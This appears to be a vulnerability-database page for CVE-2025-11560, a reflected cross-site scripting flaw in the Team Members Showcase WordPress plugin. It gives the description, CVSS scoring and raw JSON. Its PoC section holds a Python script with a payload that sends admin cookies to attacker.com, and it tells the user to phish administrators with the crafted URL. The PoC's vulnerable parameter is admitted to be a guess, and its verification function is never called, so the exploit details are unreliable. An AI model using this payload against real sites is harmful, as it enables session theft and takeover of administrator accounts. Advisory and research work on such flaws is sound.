Security Vulnerability Report
中文
CVE-2025-11560 CVSS 7.1 HIGH

CVE-2025-11560

Published: 2025-11-12 06:15:34
Last Modified: 2026-04-15 00:35:42

Description

The Team Members Showcase WordPress plugin before 3.5.0 does not sanitize and escape a parameter before outputting it back in the page, leading to reflected cross-site scripting, which could be used against high-privilege users such as admins.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Team Members Showcase WordPress plugin < 3.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11560 PoC - Team Members Showcase Plugin Reflected XSS # Affected Version: < 3.5.0 # Target: WordPress with Team Members Showcase plugin installed import requests from urllib.parse import quote target_url = "http://target-wordpress-site.com/" # Malicious payload for reflected XSS # This payload steals admin cookies when executed xss_payload = "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>" # Construct malicious URL with XSS payload # The exact parameter name depends on the vulnerable endpoint malicious_url = f"{target_url}?tmms_search={quote(xss_payload)}" print(f"[*] Target: {target_url}") print(f"[*] Malicious URL: {malicious_url}") print(f"[*] Send this URL to WordPress admin via phishing email or social engineering") # Verify vulnerability exists (optional, for authorized testing only) def verify_xss(url, payload): """Verify XSS vulnerability exists""" test_url = url.replace(quote(xss_payload), quote(payload)) try: response = requests.get(test_url, timeout=10) if payload in response.text: return True except Exception as e: print(f"[!] Error: {e}") return False print("\n[!] This PoC is for authorized security testing only!") print("[!] Always obtain proper authorization before testing.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11560", "sourceIdentifier": "[email protected]", "published": "2025-11-12T06:15:33.553", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Team Members Showcase WordPress plugin before 3.5.0 does not sanitize and escape a parameter before outputting it back in the page, leading to reflected cross-site scripting, which could be used against high-privilege users such as admins."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "references": [{"url": "https://wpscan.com/vulnerability/64d7a074-3f1d-4b09-8e96-d76b9fb3c41e/", "source": "[email protected]"}]}}